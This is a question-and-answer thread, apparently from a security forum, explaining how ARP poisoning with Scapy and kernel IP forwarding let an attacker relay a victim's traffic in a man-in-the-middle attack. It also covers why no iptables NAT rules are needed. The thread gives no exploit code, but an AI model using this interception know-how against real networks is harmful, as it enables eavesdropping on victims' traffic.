6

Background:

I understand that in order to ARP spoof a victim in a network using Scapy, we need to send ARP reply packets to the victim and the gateway router with the correct destination and Source IP address, but with the attacker's source Mac Address, essentially stating that the attacker is the gateway to the victim, and the victim to the gateway, hence being the man in the middle. Also the attacker would need to echo 1 to /proc/sys/net/ipv4/ip_forward to enable ip forwarding

Question:

So my question is, after arp poisoning the victim and the gateway, how will the victim's traffic be redirected to the router, and router's response traffic to be redirected back to the victim? Will the attacker need to change up the firewall configurations in iptable? Such as in the pre-routing chain of the nat table, redirecting victim's traffic tcp port 80, and 443 to the gateway IP, and also forwarding the router response packets (src port 80/443) back to the victim?

Since most of the examples on the web does not talk about their firewall configurations, so I was wondering if changing up the nat table for pre-routing chain was also a necessary step to take in order to administer a MITM attack.

Example:

https://www.youtube.com/watch?v=fkYd8MPzgts Question about this example video: How in the world did the attacker sniffed the dns packet using scapy just by filtering tcp port 80. Since in the video the attacker did not show any firewall (iptables) configurations, I assumed that all of the victim's traffic including DNS query packets were all sent to the attacker, then how did the victim obtain connection with google and twitter if the attacker didn't forward the traffic to the gateway/victim?

Can someone please explain? Thank you in advance.

Grant Miller
  • 205
  • 2
  • 3
  • 11
0x5929
  • 335
  • 4
  • 13

1 Answers1

7

Scapy does not route the traffic, nor does it touch the traffic at all in this scenario. When you enable IP forwarding on a host, it becomes a router. When the host receives a packet not destined for one of its own addresses, its kernel will route the packet per its routing table. Since the traffic from the victim has a destination IP address not matching the attacker's machine, in most cases this will result in the traffic being forwarded on to the attacker's default gateway, which is typically the network's gateway/router.

For example, an attacker has performed a bidirectonal ARP poisoning attack. The victim thinks that the attacker's machine is the router, and the router thinks the attacker's machine is the victim's. The victim sends a packet to 8.8.8.8, which is received at the attacker's machine. The packet is not addressed to the attacker, so it is sent on to the default gateway. The response from the server behaves the same way; the router will send the packet addressed to the victim, which will go to the attacker. Again, it is not addressed to the attacker, so it is forwarded again.

You mention firewall rules being involved. A clean iptables/nftables setup has default ACCEPT for all chains. There is nothing inhibiting the above routing of packets once forwarding is turned on in the kernel, unless firewall rules have been added to prevent it.

multithr3at3d
  • 12,355
  • 3
  • 29
  • 42
  • Thank you for such a clarifying answer, this was exactly what I needed. My Iptable configuration for the filter chain is set to DROP, but I will write a rule allowing traffic from source and destination IP for the victim. – 0x5929 Jan 18 '18 at 06:59